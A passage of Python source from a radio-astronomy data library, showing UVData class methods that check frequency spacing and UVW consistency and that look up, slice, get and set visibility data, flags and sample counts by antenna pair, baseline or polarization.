] * np.sum(chan_mask)
# Pop off the first entry, since the above arrays are diff'd
# (and thus one element shorter)
freq_dir = np.array(freq_dir[1:])
# Ignore cases where looking at the boundaries of spectral windows
bypass_check = self.flex_spw_id_array[1:] != self.flex_spw_id_array[:-1]
if not np.all(
np.logical_or(
bypass_check,
np.isclose(
diff_chanwidth,
0.0,
rtol=self._freq_array.tols[0],
atol=self._freq_array.tols[1],
),
)
):
spacing_error = True
if not np.all(
np.logical_or(
bypass_check,
np.isclose(
freq_spacing,
self.channel_width[1:] * freq_dir,
rtol=self._freq_array.tols[0],
atol=self._freq_array.tols[1],
),
)
):
chanwidth_error = True
else:
freq_dir = np.sign(np.mean(freq_spacing))
if not np.isclose(
np.min(freq_spacing),
np.max(freq_spacing),
rtol=self._freq_array.tols[0],
atol=self._freq_array.tols[1],
):
spacing_error = True
if self.future_array_shapes:
if not np.isclose(
np.min(self.channel_width),
np.max(self.channel_width),
rtol=self._freq_array.tols[0],
atol=self._freq_array.tols[1],
):
spacing_error = True
else:
if not np.isclose(
np.mean(freq_spacing),
np.mean(self.channel_width) * freq_dir,
rtol=self._channel_width.tols[0],
atol=self._channel_width.tols[1],
):
chanwidth_error = True
else:
if not np.isclose(
np.mean(freq_spacing),
self.channel_width * freq_dir,
rtol=self._channel_width.tols[0],
atol=self._channel_width.tols[1],
):
chanwidth_error = True
if raise_errors and spacing_error:
raise ValueError(
"The frequencies are not evenly spaced (probably "
"because of a select operation) or has differing "
"values of channel widths. Some file formats "
"(e.g. uvfits, miriad) and methods (frequency_average) "
"do not support unevenly spaced frequencies."
)
if raise_errors and chanwidth_error:
raise ValueError(
"The frequencies are separated by more than their "
"channel width (probably because of a select operation). "
"Some file formats (e.g. uvfits, miriad) and "
"methods (frequency_average) do not support "
"frequencies that are spaced by more than their "
"channel width."
)
return spacing_error, chanwidth_error
def _calc_nants_data(self):
"""Calculate the number of antennas from ant_1_array and ant_2_array arrays."""
return int(np.union1d(self.ant_1_array, self.ant_2_array).size)
def check(
self,
check_extra=True,
run_check_acceptability=True,
check_freq_spacing=False,
strict_uvw_antpos_check=False,
allow_flip_conj=False,
):
"""
Add some extra checks on top of checks on UVBase class.
Check that required parameters exist. Check that parameters have
appropriate shapes and optionally that the values are acceptable.
Parameters
----------
check_extra : bool
If true, check all parameters, otherwise only check required parameters.
run_check_acceptability : bool
Option to check if values in parameters are acceptable.
check_freq_spacing : bool
Option to check if frequencies are evenly spaced and the spacing is
equal to their channel_width. This is not required for UVData
objects in general but is required to write to uvfits and miriad files.
strict_uvw_antpos_check : bool
Option to raise an error rather than a warning if the check that
uvws match antenna positions does not pass.
allow_flip_conj : bool
If set to True, and the UVW coordinates do not match antenna positions,
check and see if flipping the conjugation of the baselines (i.e, multiplying
the UVWs by -1) resolves the apparent discrepancy -- and if it does, fix
the apparent conjugation error in `uvw_array` and `data_array`. Default is
False.
Returns
-------
bool
True if check passes
Raises
------
ValueError
if parameter shapes or types are wrong or do not have acceptable
values (if run_check_acceptability is True)
"""
# first run the basic check from UVBase
# set the phase type based on object's value
if self.phase_type == "phased":
self._set_phased()
elif self.phase_type == "drift":
self._set_drift()
else:
raise ValueError('Phase type must be either "phased" or "drift"')
super(UVData, self).check(
check_extra=check_extra, run_check_acceptability=run_check_acceptability
)
# Check internal consistency of numbers which don't explicitly correspond
# to the shape of another array.
if self.Nants_data != self._calc_nants_data():
raise ValueError(
"Nants_data must be equal to the number of unique "
"values in ant_1_array and ant_2_array"
)
if self.Nbls != len(np.unique(self.baseline_array)):
raise ValueError(
"Nbls must be equal to the number of unique "
"baselines in the data_array"
)
if self.Ntimes != len(np.unique(self.time_array)):
raise ValueError(
"Ntimes must be equal to the number of unique "
"times in the time_array"
)
# require that all entries in ant_1_array and ant_2_array exist in
# antenna_numbers
if not set(np.unique(self.ant_1_array)).issubset(self.antenna_numbers):
raise ValueError("All antennas in ant_1_array must be in antenna_numbers.")
if not set(np.unique(self.ant_2_array)).issubset(self.antenna_numbers):
raise ValueError("All antennas in ant_2_array must be in antenna_numbers.")
# issue warning if extra_keywords keys are longer than 8 characters
for key in self.extra_keywords.keys():
if len(key) > 8:
warnings.warn(
"key {key} in extra_keywords is longer than 8 "
"characters. It will be truncated to 8 if written "
"to uvfits or miriad file formats.".format(key=key)
)
# issue warning if extra_keywords values are lists, arrays or dicts
for key, value in self.extra_keywords.items():
if isinstance(value, (list, dict, np.ndarray)):
warnings.warn(
"{key} in extra_keywords is a list, array or dict, "
"which will raise an error when writing uvfits or "
"miriad file types".format(key=key)
)
if run_check_acceptability:
# check that the uvws make sense given the antenna positions
# make a metadata only copy of this object to properly calculate uvws
temp_obj = self.copy(metadata_only=True)
if temp_obj.phase_center_frame is not None:
output_phase_frame = temp_obj.phase_center_frame
else:
output_phase_frame = "icrs"
with warnings.catch_warnings():
warnings.simplefilter("ignore")
temp_obj.set_uvws_from_antenna_positions(
allow_phasing=True, output_phase_frame=output_phase_frame,
)
if not np.allclose(temp_obj.uvw_array, self.uvw_array, atol=1):
max_diff = np.max(np.abs(temp_obj.uvw_array - self.uvw_array))
if allow_flip_conj and np.allclose(
-temp_obj.uvw_array, self.uvw_array, atol=1
):
warnings.warn(
"UVW orientation appears to be flipped, attempting to "
"fix by changing conjugation of baselines."
)
self.uvw_array *= -1
self.data_array = np.conj(self.data_array)
elif not strict_uvw_antpos_check:
warnings.warn(
"The uvw_array does not match the expected values given "
"the antenna positions. The largest discrepancy is "
f"{max_diff} meters. This is a fairly common situation "
"but might indicate an error in the antenna positions, "
"the uvws or the phasing."
)
else:
raise ValueError(
"The uvw_array does not match the expected values given "
"the antenna positions. The largest discrepancy is "
f"{max_diff} meters."
)
# check auto and cross-corrs have sensible uvws
autos = np.isclose(self.ant_1_array - self.ant_2_array, 0.0)
if not np.all(
np.isclose(
self.uvw_array[autos],
0.0,
rtol=self._uvw_array.tols[0],
atol=self._uvw_array.tols[1],
)
):
raise ValueError(
"Some auto-correlations have non-zero uvw_array coordinates."
)
if np.any(
np.isclose(
# this line used to use np.linalg.norm but it turns out
# squaring and sqrt is slightly more efficient unless the array
# is "very large".
np.sqrt(
self.uvw_array[~autos, 0] ** 2
+ self.uvw_array[~autos, 1] ** 2
+ self.uvw_array[~autos, 2] ** 2
),
0.0,
rtol=self._uvw_array.tols[0],
atol=self._uvw_array.tols[1],
)
):
raise ValueError(
"Some cross-correlations have near-zero uvw_array magnitudes."
)
if check_freq_spacing:
self._check_freq_spacing()
return True
def copy(self, metadata_only=False):
"""
Make and return a copy of the UVData object.
Parameters
----------
metadata_only : bool
If True, only copy the metadata of the object.
Returns
-------
UVData
Copy of self.
"""
if not metadata_only:
return super(UVData, self).copy()
else:
uv = UVData()
# include all attributes, not just UVParameter ones.
for attr in self.__iter__(uvparams_only=False):
# skip properties
if isinstance(getattr(type(self), attr, None), property):
continue
# skip data like parameters
# parameter names have a leading underscore we want to ignore
if attr.lstrip("_") in self._data_params:
continue
setattr(uv, attr, copy.deepcopy(getattr(self, attr)))
if uv.future_array_shapes:
for param_name in uv._data_params:
getattr(uv, "_" + param_name).form = ("Nblts", "Nfreqs", "Npols")
return uv
def baseline_to_antnums(self, baseline):
"""
Get the antenna numbers corresponding to a given baseline number.
Parameters
----------
baseline : int or array_like of int
baseline number
Returns
-------
int or array_like of int
first antenna number(s)
int or array_like of int
second antenna number(s)
"""
return uvutils.baseline_to_antnums(baseline, self.Nants_telescope)
def antnums_to_baseline(self, ant1, ant2, attempt256=False):
"""
Get the baseline number corresponding to two given antenna numbers.
Parameters
----------
ant1 : int or array_like of int
first antenna number
ant2 : int or array_like of int
second antenna number
attempt256 : bool
Option to try to use the older 256 standard used in many uvfits files
(will use 2048 standard if there are more than 256 antennas).
Returns
-------
int or array of int
baseline number corresponding to the two antenna numbers.
"""
return uvutils.antnums_to_baseline(
ant1, ant2, self.Nants_telescope, attempt256=attempt256
)
def antpair2ind(self, ant1, ant2=None, ordered=True):
"""
Get indices along the baseline-time axis for a given antenna pair.
This will search for either the key as specified, or the key and its
conjugate.
Parameters
----------
ant1, ant2 : int
Either an antenna-pair key, or key expanded as arguments,
e.g. antpair2ind( (10, 20) ) or antpair2ind(10, 20)
ordered : bool
If True, search for antpair as provided, else search for it and
its conjugate.
Returns
-------
inds : ndarray of int-64
indices of the antpair along the baseline-time axis.
"""
# check for expanded antpair or key
if ant2 is None:
if not isinstance(ant1, tuple):
raise ValueError(
"antpair2ind must be fed an antpair tuple "
"or expand it as arguments"
)
ant2 = ant1[1]
ant1 = ant1[0]
else:
if not isinstance(ant1, (int, np.integer)):
raise ValueError(
"antpair2ind must be fed an antpair tuple or "
"expand it as arguments"
)
if not isinstance(ordered, (bool, np.bool_)):
raise ValueError("ordered must be a boolean")
# if getting auto-corr, ordered must be True
if ant1 == ant2:
ordered = True
# get indices
inds = np.where((self.ant_1_array == ant1) & (self.ant_2_array == ant2))[0]
if ordered:
return inds
else:
ind2 = np.where((self.ant_1_array == ant2) & (self.ant_2_array == ant1))[0]
inds = np.asarray(np.append(inds, ind2), dtype=np.int64)
return inds
def _key2inds(self, key):
"""
Interpret user specified key as antenna pair and/or polarization.
Parameters
----------
key : tuple of int
Identifier of data. Key can be length 1, 2, or 3:
if len(key) == 1:
if (key < 5) or (type(key) is str): interpreted as a
polarization number/name, return all blts for that pol.
else: interpreted as a baseline number. Return all times and
polarizations for that baseline.
if len(key) == 2: interpreted as an antenna pair. Return all
times and pols for that baseline.
if len(key) == 3: interpreted as antenna pair and pol (ant1, ant2, pol).
Return all times for that baseline, pol. pol may be a string.
Returns
-------
blt_ind1 : ndarray of int
blt indices for antenna pair.
blt_ind2 : ndarray of int
blt indices for conjugate antenna pair.
Note if a cross-pol baseline is requested, the polarization will
also be reversed so the appropriate correlations are returned.
e.g. asking for (1, 2, 'xy') may return conj(2, 1, 'yx'), which
is equivalent to the requesting baseline. See utils.conj_pol() for
complete conjugation mapping.
pol_ind : tuple of ndarray of int
polarization indices for blt_ind1 and blt_ind2
"""
key = uvutils._get_iterable(key)
if type(key) is str:
# Single string given, assume it is polarization
pol_ind1 = np.where(
self.polarization_array
== uvutils.polstr2num(key, x_orientation=self.x_orientation)
)[0]
if len(pol_ind1) > 0:
blt_ind1 = np.arange(self.Nblts, dtype=np.int64)
blt_ind2 = np.array([], dtype=np.int64)
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
else:
raise KeyError("Polarization {pol} not found in data.".format(pol=key))
elif len(key) == 1:
key = key[0] # For simplicity
if isinstance(key, Iterable):
# Nested tuple. Call function again.
blt_ind1, blt_ind2, pol_ind = self._key2inds(key)
elif key < 5:
# Small number, assume it is a polarization number a la AIPS memo
pol_ind1 = np.where(self.polarization_array == key)[0]
if len(pol_ind1) > 0:
blt_ind1 = np.arange(self.Nblts)
blt_ind2 = np.array([], dtype=np.int64)
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
else:
raise KeyError(
"Polarization {pol} not found in data.".format(pol=key)
)
else:
# Larger number, assume it is a baseline number
inv_bl = self.antnums_to_baseline(
self.baseline_to_antnums(key)[1], self.baseline_to_antnums(key)[0]
)
blt_ind1 = np.where(self.baseline_array == key)[0]
blt_ind2 = np.where(self.baseline_array == inv_bl)[0]
if len(blt_ind1) + len(blt_ind2) == 0:
raise KeyError("Baseline {bl} not found in data.".format(bl=key))
if len(blt_ind1) > 0:
pol_ind1 = np.arange(self.Npols)
else:
pol_ind1 = np.array([], dtype=np.int64)
if len(blt_ind2) > 0:
try:
pol_ind2 = uvutils.reorder_conj_pols(self.polarization_array)
except ValueError:
if len(blt_ind1) == 0:
raise KeyError(
f"Baseline {key} not found for polarization "
"array in data."
)
else:
pol_ind2 = np.array([], dtype=np.int64)
blt_ind2 = np.array([], dtype=np.int64)
else:
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
elif len(key) == 2:
# Key is an antenna pair
blt_ind1 = self.antpair2ind(key[0], key[1])
blt_ind2 = self.antpair2ind(key[1], key[0])
if len(blt_ind1) + len(blt_ind2) == 0:
raise KeyError("Antenna pair {pair} not found in data".format(pair=key))
if len(blt_ind1) > 0:
pol_ind1 = np.arange(self.Npols)
else:
pol_ind1 = np.array([], dtype=np.int64)
if len(blt_ind2) > 0:
try:
pol_ind2 = uvutils.reorder_conj_pols(self.polarization_array)
except ValueError:
if len(blt_ind1) == 0:
raise KeyError(
f"Baseline {key} not found for polarization array in data."
)
else:
pol_ind2 = np.array([], dtype=np.int64)
blt_ind2 = np.array([], dtype=np.int64)
else:
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
elif len(key) == 3:
# Key is an antenna pair + pol
blt_ind1 = self.antpair2ind(key[0], key[1])
blt_ind2 = self.antpair2ind(key[1], key[0])
if len(blt_ind1) + len(blt_ind2) == 0:
raise KeyError(
"Antenna pair {pair} not found in "
"data".format(pair=(key[0], key[1]))
)
if type(key[2]) is str:
# pol is str
if len(blt_ind1) > 0:
pol_ind1 = np.where(
self.polarization_array
== uvutils.polstr2num(key[2], x_orientation=self.x_orientation)
)[0]
else:
pol_ind1 = np.array([], dtype=np.int64)
if len(blt_ind2) > 0:
pol_ind2 = np.where(
self.polarization_array
== uvutils.polstr2num(
uvutils.conj_pol(key[2]), x_orientation=self.x_orientation
)
)[0]
else:
pol_ind2 = np.array([], dtype=np.int64)
else:
# polarization number a la AIPS memo
if len(blt_ind1) > 0:
pol_ind1 = np.where(self.polarization_array == key[2])[0]
else:
pol_ind1 = np.array([], dtype=np.int64)
if len(blt_ind2) > 0:
pol_ind2 = np.where(
self.polarization_array == uvutils.conj_pol(key[2])
)[0]
else:
pol_ind2 = np.array([], dtype=np.int64)
pol_ind = (pol_ind1, pol_ind2)
if len(blt_ind1) * len(pol_ind[0]) + len(blt_ind2) * len(pol_ind[1]) == 0:
raise KeyError(
"Polarization {pol} not found in data.".format(pol=key[2])
)
# Catch autos
if np.array_equal(blt_ind1, blt_ind2):
blt_ind2 = np.array([], dtype=np.int64)
return (blt_ind1, blt_ind2, pol_ind)
def _smart_slicing(
self, data, ind1, ind2, indp, squeeze="default", force_copy=False
):
"""
Quickly get the relevant section of a data-like array.
Used in get_data, get_flags and get_nsamples.
Parameters
----------
data : ndarray
4-dimensional array shaped like self.data_array
ind1 : array_like of int
blt indices for antenna pair (e.g. from self._key2inds)
ind2 : array_like of int
blt indices for conjugate antenna pair. (e.g. from self._key2inds)
indp : tuple array_like of int
polarization indices for ind1 and ind2 (e.g. from self._key2inds)
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
force_copy : bool
Option to explicitly make a copy of the data.
Returns
-------
ndarray
copy (or if possible, a read-only view) of relevant section of data
"""
p_reg_spaced = [False, False]
p_start = [0, 0]
p_stop = [0, 0]
dp = [1, 1]
for i, pi in enumerate(indp):
if len(pi) == 0:
continue
if len(set(np.ediff1d(pi))) <= 1:
p_reg_spaced[i] = True
p_start[i] = pi[0]
p_stop[i] = pi[-1] + 1
if len(pi) != 1:
dp[i] = pi[1] - pi[0]
if len(ind2) == 0:
# only unconjugated baselines
if len(set(np.ediff1d(ind1))) <= 1:
blt_start = ind1[0]
blt_stop = ind1[-1] + 1
if len(ind1) == 1:
dblt = 1
else:
dblt = ind1[1] - ind1[0]
if p_reg_spaced[0]:
if self.future_array_shapes:
out = data[
blt_start:blt_stop:dblt, :, p_start[0] : p_stop[0] : dp[0]
]
else:
out = data[
blt_start:blt_stop:dblt,
:,
:,
p_start[0] : p_stop[0] : dp[0],
]
else:
if self.future_array_shapes:
out = data[blt_start:blt_stop:dblt, :, indp[0]]
else:
out = data[blt_start:blt_stop:dblt, :, :, indp[0]]
else:
out = data[ind1]
if p_reg_spaced[0]:
if self.future_array_shapes:
out = out[:, :, p_start[0] : p_stop[0] : dp[0]]
else:
out = out[:, :, :, p_start[0] : p_stop[0] : dp[0]]
else:
if self.future_array_shapes:
out = out[:, :, indp[0]]
else:
out = out[:, :, :, indp[0]]
elif len(ind1) == 0:
# only conjugated baselines
if len(set(np.ediff1d(ind2))) <= 1:
blt_start = ind2[0]
blt_stop = ind2[-1] + 1
if len(ind2) == 1:
dblt = 1
else:
dblt = ind2[1] - ind2[0]
if p_reg_spaced[1]:
if self.future_array_shapes:
out = np.conj(
data[
blt_start:blt_stop:dblt,
:,
p_start[1] : p_stop[1] : dp[1],
]
)
else:
out = np.conj(
data[
blt_start:blt_stop:dblt,
:,
:,
p_start[1] : p_stop[1] : dp[1],
]
)
else:
if self.future_array_shapes:
out = np.conj(data[blt_start:blt_stop:dblt, :, indp[1]])
else:
out = np.conj(data[blt_start:blt_stop:dblt, :, :, indp[1]])
else:
out = data[ind2]
if p_reg_spaced[1]:
if self.future_array_shapes:
out = np.conj(out[:, :, p_start[1] : p_stop[1] : dp[1]])
else:
out = np.conj(out[:, :, :, p_start[1] : p_stop[1] : dp[1]])
else:
if self.future_array_shapes:
out = np.conj(out[:, :, indp[1]])
else:
out = np.conj(out[:, :, :, indp[1]])
else:
# both conjugated and unconjugated baselines
out = (data[ind1], np.conj(data[ind2]))
if p_reg_spaced[0] and p_reg_spaced[1]:
if self.future_array_shapes:
out = np.append(
out[0][:, :, p_start[0] : p_stop[0] : dp[0]],
out[1][:, :, p_start[1] : p_stop[1] : dp[1]],
axis=0,
)
else:
out = np.append(
out[0][:, :, :, p_start[0] : p_stop[0] : dp[0]],
out[1][:, :, :, p_start[1] : p_stop[1] : dp[1]],
axis=0,
)
else:
if self.future_array_shapes:
out = np.append(
out[0][:, :, indp[0]], out[1][:, :, indp[1]], axis=0
)
else:
out = np.append(
out[0][:, :, :, indp[0]], out[1][:, :, :, indp[1]], axis=0
)
if squeeze == "full":
out = np.squeeze(out)
elif squeeze == "default":
if self.future_array_shapes:
if out.shape[2] == 1:
# one polarization dimension
out = np.squeeze(out, axis=2)
else:
if out.shape[3] == 1:
# one polarization dimension
out = np.squeeze(out, axis=3)
if out.shape[1] == 1:
# one spw dimension
out = np.squeeze(out, axis=1)
elif squeeze != "none":
raise ValueError(
'"' + str(squeeze) + '" is not a valid option for squeeze.'
'Only "default", "none", or "full" are allowed.'
)
if force_copy:
out = np.array(out)
elif out.base is not None:
# if out is a view rather than a copy, make it read-only
out.flags.writeable = False
return out
def get_ants(self):
"""
Get the unique antennas that have data associated with them.
Returns
-------
ndarray of int
Array of unique antennas with data associated with them.
"""
return np.unique(np.append(self.ant_1_array, self.ant_2_array))
def get_baseline_nums(self):
"""
Get the unique baselines that have data associated with them.
Returns
-------
ndarray of int
Array of unique baselines with data associated with them.
"""
return np.unique(self.baseline_array)
def get_antpairs(self):
"""
Get the unique antpair tuples that have data associated with them.
Returns
-------
list of tuples of int
list of unique antpair tuples (ant1, ant2) with data associated with them.
"""
return list(zip(*self.baseline_to_antnums(self.get_baseline_nums())))
def get_pols(self):
"""
Get the polarizations in the data.
Returns
-------
list of str
list of polarizations (as strings) in the data.
"""
return uvutils.polnum2str(
self.polarization_array, x_orientation=self.x_orientation
)
def get_antpairpols(self):
"""
Get the unique antpair + pol tuples that have data associated with them.
Returns
-------
list of tuples of int
list of unique antpair + pol tuples (ant1, ant2, pol) with data
associated with them.
"""
pols = self.get_pols()
bls = self.get_antpairs()
return [(bl) + (pol,) for bl in bls for pol in pols]
def get_feedpols(self):
"""
Get the unique antenna feed polarizations in the data.
Returns
-------
list of str
list of antenna feed polarizations (e.g. ['X', 'Y']) in the data.
Raises
------
ValueError
If any pseudo-Stokes visibilities are present
"""
if np.any(self.polarization_array > 0):
raise ValueError(
"Pseudo-Stokes visibilities cannot be interpreted as feed polarizations"
)
else:
return list(set("".join(self.get_pols())))
def get_data(self, key1, key2=None, key3=None, squeeze="default", force_copy=False):
"""
Get the data corresonding to a baseline and/or polarization.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all data for
that pol.
else:
interpreted as a baseline number, get all data for that baseline.
if key is length 2: interpreted as an antenna pair, get all data
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all data for that baseline, pol. pol may be a string or int.
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
force_copy : bool
Option to explicitly make a copy of the data.
Returns
-------
ndarray
copy (or if possible, a read-only view) of relevant section of data.
If data exists conjugate to requested antenna pair, it will be conjugated
before returning.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
ind1, ind2, indp = self._key2inds(key)
out = self._smart_slicing(
self.data_array, ind1, ind2, indp, squeeze=squeeze, force_copy=force_copy
)
return out
def get_flags(
self, key1, key2=None, key3=None, squeeze="default", force_copy=False
):
"""
Get the flags corresonding to a baseline and/or polarization.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all flags for
that pol.
else:
interpreted as a baseline number, get all flags for that baseline.
if key is length 2: interpreted as an antenna pair, get all flags
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all flags for that baseline, pol. pol may be a string or int.
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
force_copy : bool
Option to explicitly make a copy of the data.
Returns
-------
ndarray
copy (or if possible, a read-only view) of relevant section of flags.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
ind1, ind2, indp = self._key2inds(key)
# When we select conjugated baselines, there is a call to np.conj()
# inside of _smart_slicing to correct the data array. This has the
# unintended consequence of promoting the dtype of an array of np.bool_
# to np.int8. Rather than having a bunch of special handling for this
# ~corner case, we instead explicitly cast back to np.bool_ before we
# hand back to the user.
out = self._smart_slicing(
self.flag_array, ind1, ind2, indp, squeeze=squeeze, force_copy=force_copy
).astype(np.bool_)
return out
def get_nsamples(
self, key1, key2=None, key3=None, squeeze="default", force_copy=False
):
"""
Get the nsamples corresonding to a baseline and/or polarization.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all nsamples for
that pol.
else:
interpreted as a baseline number, get all nsamples for that
baseline.
if key is length 2: interpreted as an antenna pair, get all nsamples
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all nsamples for that baseline, pol. pol may be a string or int.
squeeze : str
string specifying how to squeeze the returned array. Options are:
'default': squeeze pol and spw dimensions if possible;
'none': no squeezing of resulting numpy array;
'full': squeeze all length 1 dimensions.
force_copy : bool
Option to explicitly make a copy of the data.
Returns
-------
ndarray
copy (or if possible, a read-only view) of relevant section of
nsample_array.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
ind1, ind2, indp = self._key2inds(key)
out = self._smart_slicing(
self.nsample_array, ind1, ind2, indp, squeeze=squeeze, force_copy=force_copy
)
return out
def get_times(self, key1, key2=None, key3=None):
"""
Get the times for a given antpair or baseline number.
Meant to be used in conjunction with get_data function.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all times.
else:
interpreted as a baseline number, get all times for that baseline.
if key is length 2: interpreted as an antenna pair, get all times
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all times for that baseline.
Returns
-------
ndarray
times from the time_array for the given antpair or baseline.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
inds1, inds2, indp = self._key2inds(key)
return self.time_array[np.append(inds1, inds2)]
def get_lsts(self, key1, key2=None, key3=None):
"""
Get the LSTs for a given antpair or baseline number.
Meant to be used in conjunction with get_data function.
Parameters
----------
key1, key2, key3 : int or tuple of ints
Identifier of which data to get, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all times.
else:
interpreted as a baseline number, get all times for that baseline.
if key is length 2: interpreted as an antenna pair, get all times
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all times for that baseline.
Returns
-------
ndarray
LSTs from the lst_array for the given antpair or baseline.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
inds1, inds2, indp = self._key2inds(key)
return self.lst_array[np.append(inds1, inds2)]
def get_ENU_antpos(self, center=False, pick_data_ants=False):
"""
Get antenna positions in ENU (topocentric) coordinates in units of meters.
Parameters
----------
center : bool
If True, subtract median of array position from antpos
pick_data_ants : bool
If True, return only antennas found in data
Returns
-------
antpos : ndarray
Antenna positions in ENU (topocentric) coordinates in units of
meters, shape=(Nants, 3)
ants : ndarray
Antenna numbers matching ordering of antpos, shape=(Nants,)
"""
antpos = uvutils.ENU_from_ECEF(
(self.antenna_positions + self.telescope_location),
*self.telescope_location_lat_lon_alt,
)
ants = self.antenna_numbers
if pick_data_ants:
data_ants = np.unique(np.concatenate([self.ant_1_array, self.ant_2_array]))
telescope_ants = self.antenna_numbers
select = np.in1d(telescope_ants, data_ants)
antpos = antpos[select, :]
ants = telescope_ants[select]
if center is True:
antpos -= np.median(antpos, axis=0)
return antpos, ants
def _set_method_helper(self, dshape, key1, key2=None, key3=None):
"""
Extract the indices for setting data, flags, or nsample arrays.
This is a helper method designed to work with set_data, set_flags, and
set_nsamples. Given the shape of the data-like array and the keys
corresponding to where the data should end up, it finds the indices
that are needed for the `_index_dset` method.
Parameters
----------
dshape : tuple of int
The shape of the data-like array. This is used to ensure the array
is compatible with the indices selected.
key1, key2, key3 : int or tuple of ints
Identifier of which flags to set, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, set all flags for
that pol.
else:
interpreted as a baseline number, set all flags for that baseline.
if key is length 2: interpreted as an antenna pair, set all flags
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
set all flags for that baseline, pol. pol may be a string or int.
Returns
-------
inds : tuple of int
The indices in the data-like array to slice into.
Raises
------
ValueError:
If more than 3 keys are passed, if the requested indices are
conjugated in the data, if the data array shape is not compatible
with the indices.
"""
key = []
for val in [key1, key2, key3]:
if isinstance(val, str):
key.append(val)
elif val is not None:
key += list(uvutils._get_iterable(val))
if len(key) > 3:
raise ValueError("no more than 3 key values can be passed")
ind1, ind2, indp = self._key2inds(key)
if len(ind2) != 0:
raise ValueError(
"the requested key is present on the object, but conjugated. Please "
"conjugate data and keys appropriately and try again"
)
if self.future_array_shapes:
expected_shape = (len(ind1), self.Nfreqs, len(indp[0]))
else:
expected_shape = (len(ind1), 1, self.Nfreqs, len(indp[0]))
if dshape != expected_shape:
raise ValueError(
"the input array is not compatible with the shape of the destination. "
f"Input array shape is {dshape}, expected shape is {expected_shape}."
)
blt_slices, blt_sliceable = uvutils._convert_to_slices(
ind1, max_nslice_frac=0.1
)
pol_slices, pol_sliceable = uvutils._convert_to_slices(
indp[0], max_nslice_frac=0.5
)
if self.future_array_shapes:
inds = [ind1, np.s_[:], indp[0]]
else:
inds = [ind1, np.s_[:], np.s_[:], indp[0]]
if blt_sliceable:
inds[0] = blt_slices
if pol_sliceable:
inds[-1] = pol_slices
return tuple(inds)
def set_data(self, data, key1, key2=None, key3=None):
"""
Set the data array to some values provided by the user.
Parameters
----------
data : ndarray of complex
The data to overwrite into the data_array. Must be the same shape as
the target indices.
key1, key2, key3 : int or tuple of ints
Identifier of which data to set, can be passed as 1, 2, or 3 arguments
or as a single tuple of length 1, 2, or 3. These are collectively
called the key.
If key is length 1:
if (key < 5) or (type(key) is str):
interpreted as a polarization number/name, get all data for
that pol.
else:
interpreted as a baseline number, get all data for that baseline.
if key is length 2: interpreted as an antenna pair, get all data
for that baseline.
if key is length 3: interpreted as antenna pair and pol (ant1, ant2, pol),
get all data for that baseline, pol. pol may be a string or int.
Returns
-------
None
Raises
------
ValueError:
If more than 3 keys are passed, if the requested indices are
conjugated in the data, if the data array shape is not compatible
with the indices.
"""
dshape = data.shape
inds = self._set_method_helper(dshape, key1, key2, key3)
uvutils._index_dset(self.data_array, inds, data)
return
def set_flags(self, flags, key1, key2=None, key3=None):
"""
Set the flag array to some values provided by the user.
Parameters
----------
flag : ndarray of boolean
The flags to overwrite into the fkag_array. Must be the same shape
as the target indices.
